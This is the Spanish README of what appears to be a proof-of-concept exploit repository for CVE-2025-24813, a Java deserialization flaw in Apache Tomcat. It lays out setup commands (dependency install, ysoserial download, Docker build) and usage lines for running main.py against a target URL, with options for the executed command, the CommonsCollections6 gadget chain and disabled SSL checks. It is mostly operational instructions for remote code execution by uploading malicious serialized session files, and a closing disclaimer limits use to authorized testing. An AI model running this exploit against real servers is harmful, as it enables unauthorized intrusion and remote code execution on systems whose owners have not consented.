
Prueba de concepto del exploit para CVE-2025-24813, una vulnerabilidad de deserialización de Java en Apache Tomcat. Genera cargas útiles serializadas maliciosas y las sube como archivos de sesión para desencadenar ejecución remota de código.
Este repositorio contiene un exploit de prueba de concepto para CVE-2025-24813, una vulnerabilidad de deserialización de Java en Apache Tomcat.
Basado en absholi7ly/POC-CVE-2025-24813/.
Instalar dependencias:
uv venv
source .venv/bin/activate
uv sync
Descargar ysoserial:
./download.sh
Construir y ejecutar el exploit en un contenedor:
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
Ejecutar el exploit directamente:
python main.py <target_url> [options]
--command: Comando a ejecutar (por defecto: calc.exe)--ysoserial: Ruta a ysoserial.jar (por defecto: ./ysoserial-all.jar)--gadget: Cadena de gadgets de ysoserial (por defecto: CommonsCollections6)--payload_type: Tipo de payload - ysoserial o java (por defecto: ysoserial)--no-ssl-verify: Deshabilitar verificación SSL# Basic usage
python main.py http://target:8080
# Custom command
python main.py http://target:8080 --command "whoami"
# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java
Esta herramienta es solo para fines educativos y de pruebas autorizadas. No la use contra sistemas que no posea o para los que no tenga permiso explícito para probar.